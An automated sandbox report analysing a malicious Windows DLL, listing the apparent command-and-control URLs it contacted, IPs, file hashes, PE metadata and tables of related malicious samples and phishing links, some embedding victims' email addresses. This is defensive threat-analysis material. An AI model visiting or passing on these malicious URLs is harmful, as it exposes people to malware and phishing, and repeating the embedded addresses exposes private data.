Name	Source	Malicious	Antivirus Detection	Reputation
https://thecype.com/wp-punch.phpefaults	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://apps.ident	msiexec.exe, 0000000C.00000003.339000834.0000000000957000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.comodoca.o	msiexec.exe, 0000000C.00000003.306019326.0000000000938000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.rcclabbd.com/wp-punch.phpr	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.letsencrypt.org0	msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://theterteboltallbrow.tk/f	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.businessinsurancelaw.com/wp-punch.phpVe	msiexec.exe, 0000000C.00000003.303659662.0000000000909000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://theterteboltallbrow.tk/j	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.comodoca.cog	msiexec.exe, 0000000C.00000003.306019326.0000000000938000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.int-x3.letsencrypt.org0/	msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.rcclabbd.com/wp-punch.php;	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://lamun.pk/	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://theterteboltallbrow.tk/wp-smarts.phpSNfc)	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://theterteboltallbrow.tk/	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://squire.ae/wp-punch.php?	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.businessinsurancelaw.com/wp-punch.php	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://lamun.pk/R	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://thecype.com/	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://theterteboltallbrow.tk/;	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.businessinsurancelaw.com/wp-punch.php(	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://thecype.com/wp-punch.php)	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://theterteboltallbrow.tk/wp-smarts.php;	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://theterteboltallbrow.tk/wp-smarts.php	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp, msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.rcclabbd.com/crosoft	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://lamun.pk/wp-punch.php	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://lamun.pk/wp-punch.phpc	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://squire.ae/	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://lamun.pk/wp-punch.phpT%	msiexec.exe, 0000000C.00000003.308169882.0000000000938000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.rcclabbd.com/z#	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://cert.int-x3.letsencrypt.org/0	msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	false		high
https://www.rcclabbd.com/wp-punch.php	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://theterteboltallbrow.tk/J	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false		unknown
https://www.rcclabbd.com/	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.co	msiexec.exe, 0000000C.00000003.306019326.0000000000938000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://lamun.pk/wp-punch.php(	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.businessinsurancelaw.com/	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://squire.ae/wp-punch.php	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.rcclabbd.com/wp-punch.phpH	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://theterteboltallbrow.tk/wp-smarts.phpider	msiexec.exe, 0000000C.00000002.565639783.000000000091B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	msiexec.exe, 0000000C.00000003.337005926.0000000000963000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cps.ro	msiexec.exe, 0000000C.00000003.339000834.0000000000957000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://thecype.com/wp-punch.php	msiexec.exe, 0000000C.00000002.565307219.00000000008C8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.businessinsurancelaw.com/wp-punch.phptw	msiexec.exe, 0000000C.00000003.303659662.0000000000909000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
192.254.225.195	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false
192.3.183.226	unknown	United States	36352	AS-COLOCROSSINGUS	false
70.32.23.56	unknown	United States	55293	A2HOSTINGUS	false
67.23.227.19	unknown	United States	33182	DIMENOCUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	329945
Start date:	13.12.2020
Start time:	17:59:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	v1Us5AICBm (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.evad.winDLL@3/1@11/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 70.9% (good quality ratio 70.4%) Quality average: 88.9% Quality standard deviation: 20.1%
HCA Information:	Successful, ratio: 63% Number of executed functions: 40 Number of non-executed functions: 24
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 51.104.139.180, 23.210.248.85, 8.253.95.121, 67.27.157.254, 8.248.147.254, 67.27.157.126, 67.27.233.126, 20.54.26.129, 92.122.213.194, 92.122.213.247, 52.155.217.156 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
192.254.225.195	wp-scan.dll	Get hash	malicious	Browse
192.3.183.226	wp-scan.dll	Get hash	malicious	Browse
	https://www.nonnie.com.ng/ruis?email=kymo@willowoodusa.com	Get hash	malicious	Browse
	https://nam03.safelinks.protection.outlook.com/?url=https%3A%2F%2Fspecfrial.online%2Fc2890d44d06bafb6c7b4aa194857ccbc%3Fid%3DbWFyay5iYXVtYW5Ab3dlbnNjb3JuaW5nLmNvbQ%3D%3D&data=02%7C01%7CPaul.Townley%40owenscorning.com%7C57e80c6031f94a765cd708d6a63fe7ef%7C09e4e683c8e44a8095d37f078d5a2649%7C0%7C0%7C636879190739673644&sdata=t4aWtIJoLI5bTvAlkH9b%2FIN7y6GseWVQVCGNqaSF2C4%3D&reserved=0	Get hash	malicious	Browse
	https://odresfua.online/ce93b7b0e618ad3ba298514c691dfad1?email=YmlyZGllLmNob3dAYWR2b2NhdGVoZWFsdGguY29t	Get hash	malicious	Browse
70.32.23.56	wp-scan.dll	Get hash	malicious	Browse
	doc.5756.xls	Get hash	malicious	Browse
	Ord5967.xls	Get hash	malicious	Browse
	invoice907.xls	Get hash	malicious	Browse
	Doc-7679.xls	Get hash	malicious	Browse
	order_1405.xls	Get hash	malicious	Browse
	https://shell-core.com/j2aqm0xkt.rar	Get hash	malicious	Browse
67.23.227.19	wp-scan.dll	Get hash	malicious	Browse
67.23.227.19	_#Ud83d#Udcde953@Westerntrust.hscni.net.htm	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
thecype.com	wp-scan.dll	Get hash	malicious	Browse	192.3.183.226
lamun.pk	wp-scan.dll	Get hash	malicious	Browse	67.23.227.19
squire.ae	wp-scan.dll	Get hash	malicious	Browse	70.32.23.56

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	aG2hS5oQsq.exe	Get hash	malicious	Browse	162.241.60.214
	3W9Z5Mn6Nh.rtf	Get hash	malicious	Browse	108.179.243.169
	DGkPaXmPUx.rtf	Get hash	malicious	Browse	192.185.129.64
	wp-scan.dll	Get hash	malicious	Browse	192.254.225.195
	SWIFT-MTC749892-10-12-20_pdf.exe	Get hash	malicious	Browse	192.185.216.110
	SN-17-2020.pdf.exe	Get hash	malicious	Browse	192.185.216.110
	Purchase Order#12202011.exe	Get hash	malicious	Browse	50.87.195.38
	https://timcoulson.com/mailer-daemon/?mail=james.dean@ahtd.ar.gov	Get hash	malicious	Browse	162.241.219.35
	https://sneakyveggies.com/wp-add	Get hash	malicious	Browse	162.241.124.195
	https://preventivahealth.com/document.html	Get hash	malicious	Browse	192.185.79.175
	https://morelifedrop.net/CD/office365.htm	Get hash	malicious	Browse	162.241.127.85
	http://amar.alwani.xalia-outlet.com/exr/amar.alwani@centrica.com	Get hash	malicious	Browse	69.49.228.190
	https://studntnu-my.sharepoint.com/:o:/g/personal/kirkebyg_ntnu_no/Eibio0jRkINJtrQ2cGW93HsBV-2OJ7plGr0_fP6Yhp0ZKw?e=zzCFN4	Get hash	malicious	Browse	162.241.27.46
	https://apcel-my.sharepoint.com/:o:/g/personal/mats_bjarnlid_apcel_se/Eo9dNcg7tRlLmRjiyE3DcEsBUUdhzATanbO-fWy_MABjEw?e=SGCxVg	Get hash	malicious	Browse	162.241.27.46
	https://statuscollectionuniform.com/wp-admin/AU/masterlifts/Global/Projects/Share/index.php	Get hash	malicious	Browse	162.214.75.114
	https://sangal.com.mx/.outlook.html	Get hash	malicious	Browse	192.185.131.183
	Payment Advice Notification.xlsx	Get hash	malicious	Browse	50.87.153.159
	Payment Advice Notification.xlsx	Get hash	malicious	Browse	50.87.153.159
	Payment Advice Notification.xlsx	Get hash	malicious	Browse	50.87.153.159
	Payment Advice Notification.xlsx	Get hash	malicious	Browse	50.87.153.159
A2HOSTINGUS	pty4	Get hash	malicious	Browse	162.249.2.189
	wp-scan.dll	Get hash	malicious	Browse	70.32.23.56
	https://shimypurr.com/asf/Twadle/00698/dHdhZGxlQHZlcm1lZXIuY29t	Get hash	malicious	Browse	67.209.121.100
	pty3	Get hash	malicious	Browse	68.66.253.100
	doc.5756.xls	Get hash	malicious	Browse	70.32.23.56
	output.xls	Get hash	malicious	Browse	70.32.23.16
	output.xls	Get hash	malicious	Browse	70.32.23.16
	output.xls	Get hash	malicious	Browse	70.32.23.16
	Ord5967.xls	Get hash	malicious	Browse	70.32.23.56
	invoice907.xls	Get hash	malicious	Browse	70.32.23.56
	Doc-7679.xls	Get hash	malicious	Browse	70.32.23.56
	order_1405.xls	Get hash	malicious	Browse	70.32.23.56
	Order.862393485.doc	Get hash	malicious	Browse	66.198.240.31
	https://shell-core.com/j2aqm0xkt.rar	Get hash	malicious	Browse	70.32.23.56
	http://secure-file-transfer-ver.webflow.io	Get hash	malicious	Browse	68.66.216.57
	https://teams-securelink-flow-docs.webflow.io/	Get hash	malicious	Browse	68.66.216.57
	https://globalforwarding.com.pe/Maersk/Maersk_line-delivery.php?code=63926583659	Get hash	malicious	Browse	68.66.226.79
	Fdquqwatjjr.exe	Get hash	malicious	Browse	85.187.154.178
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	85.187.154.178
	Purchase Order.exe	Get hash	malicious	Browse	85.187.154.178
AS-COLOCROSSINGUS	Quotation No. 233.xlsx	Get hash	malicious	Browse	192.3.146.192
	DEC 12-10 Wires.xlsx	Get hash	malicious	Browse	192.3.22.9
	TT 18,000.00 euro.xlsx	Get hash	malicious	Browse	216.170.126.121
	NEW PO-TRUSTC20-0604.exe	Get hash	malicious	Browse	154.16.116.113
	wp-scan.dll	Get hash	malicious	Browse	192.3.183.226
	ORDER.xlsx	Get hash	malicious	Browse	216.170.126.121
	101220b64.exe	Get hash	malicious	Browse	192.3.247.106
	3166805_Invoice_Receipt.exe	Get hash	malicious	Browse	198.12.123.178
	PreviewDoc.exe	Get hash	malicious	Browse	192.3.247.106
	Print-Review.exe	Get hash	malicious	Browse	192.3.247.106
	Print-Review.exe	Get hash	malicious	Browse	192.3.247.106
	New Order list.xlsx	Get hash	malicious	Browse	75.127.1.225
	HEMANI GROUP NEW ORDER.xlsx	Get hash	malicious	Browse	216.170.114.70
	d84S4fxGCp.doc	Get hash	malicious	Browse	198.12.123.178
	RRC-095-20.xlsx	Get hash	malicious	Browse	192.3.146.194
	Material Requisition and Order.xlsx	Get hash	malicious	Browse	192.3.146.169
	Shipping_Docs 12-09.xlsx	Get hash	malicious	Browse	198.12.125.17
	NewOrder-98542009.xlsx	Get hash	malicious	Browse	198.23.213.32
	PO2932.xlsx	Get hash	malicious	Browse	192.3.146.171
	TOo0haekwZ.exe	Get hash	malicious	Browse	198.12.125.17
DIMENOCUS	wp-scan.dll	Get hash	malicious	Browse	67.23.227.19
	https://onlinegenera.sn.am/lZnJUY4u40q	Get hash	malicious	Browse	67.23.232.130
	https://onlinegenera.sn.am/lZnJUY4u40q	Get hash	malicious	Browse	67.23.232.130
	https://onlinegenera.sn.am/lZnJUY4u40q	Get hash	malicious	Browse	67.23.232.130
	Order.862393485.doc	Get hash	malicious	Browse	184.171.251.122
	Payment form-976107909.doc	Get hash	malicious	Browse	184.171.251.122
	DOC051220-007_pdf.exe	Get hash	malicious	Browse	199.168.190.42
	_Remittance_.exe	Get hash	malicious	Browse	67.23.254.42
	i_Remittance.exe	Get hash	malicious	Browse	67.23.254.42
	vale-remittance.exe	Get hash	malicious	Browse	67.23.254.42
	_#Ud83d#Udcde953@Westerntrust.hscni.net.htm	Get hash	malicious	Browse	67.23.227.19
	https://h2oholdings.lk/smskod/one/westpac/login	Get hash	malicious	Browse	107.161.181.250
	tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.js	Get hash	malicious	Browse	67.23.238.50
	tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.js	Get hash	malicious	Browse	67.23.238.50
	http://250374-5014.futureriseeducation.com/qhlpbczkwxve/dG9tLndpbGN6YWtAc2VhcnNoYy5jb20=	Get hash	malicious	Browse	67.23.242.106
	USD67,884.08_Payment_Advise_9083008849.exe	Get hash	malicious	Browse	198.136.51.123
	http://www.947947.mirramodaintima.com.br/#aHR0cHM6Ly9lbXl0dXJrLmNvbS9zZC9JSy9vZjEvRmlkZWwuVG9ycmVzQHNlYXJzaGMuY29t	Get hash	malicious	Browse	177.234.159.42
	invoice.exe	Get hash	malicious	Browse	109.73.164.114
	ddos________ (IW0Irt2zSey6D6LMEgcs2kqQiSuMa 8 G).js	Get hash	malicious	Browse	67.23.238.50
	ddos________ (IW0Irt2zSey6D6LMEgcs2kqQiSuMa 8 G).js	Get hash	malicious	Browse	67.23.238.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Ca4fOzoNzJ.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	FAEROE#U007e0.EXE	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	VITHAF#U007e0.EXE	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	U0N4EBAJKJ.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	DAK0SFLsXV.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	TrustedInstaller.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	wp-scan.dll	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	SWIFT-MTC749892-10-12-20_pdf.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	aPe6wtn4Y8.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	Pw5WhqWFzK.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	soft.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	SN-17-2020.pdf.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	MSI4614.dll	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	zethpill.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	Z7G2lyR0tT.exe	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	imgengine.dll	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	http://email.dream11.com/ls/click?upn=gIaedBDL7lfVNdbAB8knTqzWOtzKjiGAdIjxItTBzfisZ9eaHsszPGYIVZ5c9tVbThEq-2F7r5H1ddfXxGAiqSEA-3D-3Dy1dA_TJcqyuN2iNYyC7hiQE8uPnpIrwAwiFHKa7P9O3CiGRV5Zdc60yh-2FWLCKsCnUSROY-2BBKuKVdEC0LWtK4-2FOrxpuEIEn6IxtcLH08KwUXmYODW9pymsy9zpjJC1l0k2-2B2ZGDA7llrlg-2BDC-2Fg3YTrgVq0OyM4w1U-2FU2mGIUK7D9YLK8POQedJhTmuBqzj8PIDSm2-2Bu5mOV-2B6GOLE63z6lg4PTw-3D-3D	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	https://intouch.mtn.com	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	https://nelleinletapt.buzz/CD/office365.htm	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fin0038847990.sn.am%2flfCk7ZE6GWq&c=E,1,XbwqZlmKwFAf_trFhDdV9wkuU6vutPEIQqN4IhE8jUbxLD3wnPPXDvKp8Jibjk9HngPAI5iRQWnG4vU_DQMKfMGkzgCqkZ-4BfRprMNSl9Nr7VoPQEtWNft5&typo=1	Get hash	malicious	Browse	192.254.225.195 192.3.183.226 70.32.23.56 67.23.227.19

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Xyd\yvek.dll Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	389120
Entropy (8bit):	6.772300701631193
Encrypted:	false
SSDEEP:	6144:j2yIqOCYbeyUaNpV55IQB5ykPgScnOfIvI+ZcZfqAf7Vv7U0+jG8CuJ:jPYb3UaNpV52QB5ykXcqacZfqARv7Bmj
MD5:	E0AF3054669D6232870B87E1E239A689
SHA1:	F0AA6E50471E70D07A1B70207F38538CB31ED569
SHA-256:	F8503947E0E984865A29D1E3F8A62CE7034069F49C2A2DD902AF68274F192224
SHA-512:	1574E2ACA2415A90677053DA5F625D4A9E3BB2E85362CC7ACC7B6430A35EB889883DA1FDA694D79EE38349FEE01B5843D0717D864E2D801302755188308D513F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 28%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=B..S...S...S.[(-...S..>...S......S..(...S..=...S.......S...R.+.S..!...S..)...S../...S..+...S.Rich..S.........................PE..L....6}E...........!.........P.......&.......................................`..............................................h...x....0.......................@...... ................................{..@............................................text...(........................... ..`.rdata..............................@..@.data............ ..................@....rsrc........0......................@..@.reloc.......@... ..................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.772300701631193
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	v1Us5AICBm.dll
File size:	389120
MD5:	e0af3054669d6232870b87e1e239a689
SHA1:	f0aa6e50471e70d07a1b70207f38538cb31ed569
SHA256:	f8503947e0e984865a29d1e3f8a62ce7034069f49c2a2dd902af68274f192224
SHA512:	1574e2aca2415a90677053da5f625d4a9e3bb2e85362cc7acc7b6430a35eb889883da1fda694d79ee38349fee01b5843d0717d864e2d801302755188308d513f
SSDEEP:	6144:j2yIqOCYbeyUaNpV55IQB5ykPgScnOfIvI+ZcZfqAf7Vv7U0+jG8CuJ:jPYb3UaNpV52QB5ykXcqacZfqARv7Bmj
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=B..S...S...S.[(-...S..>...S......S..(...S..=...S.......S...R.+.S..!...S..)...S../...S..+...S.Rich..S................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x100026e5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x457D36C4 [Mon Dec 11 10:45:24 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ac30ec1b90a9fedffe3cfc3e897b5a40

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007F0A38FE5CE7h
call 00007F0A38FEAD5Ah
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007F0A38FE5BD2h
pop ecx
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F0A38FE5D06h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F0A38FE5D30h
test ecx, 00000003h
jne 00007F0A38FE5CD1h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F0A38FE5CCAh
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F0A38FE5D14h
test ah, ah
je 00007F0A38FE5D06h
test eax, 00FF0000h
je 00007F0A38FE5CF5h
test eax, FF000000h
je 00007F0A38FE5CE4h
jmp 00007F0A38FE5CAFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 000512D0h

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[IMP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x58568	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0xf80	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x64000	0x11b0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x51220	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x57bf8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x1e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4fb28	0x50000	False	0.811544799805	data	6.97945124569	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x800c	0x9000	False	0.459689670139	data	5.7180496081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5a000	0x87f8	0x2000	False	0.2216796875	data	2.42882006124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
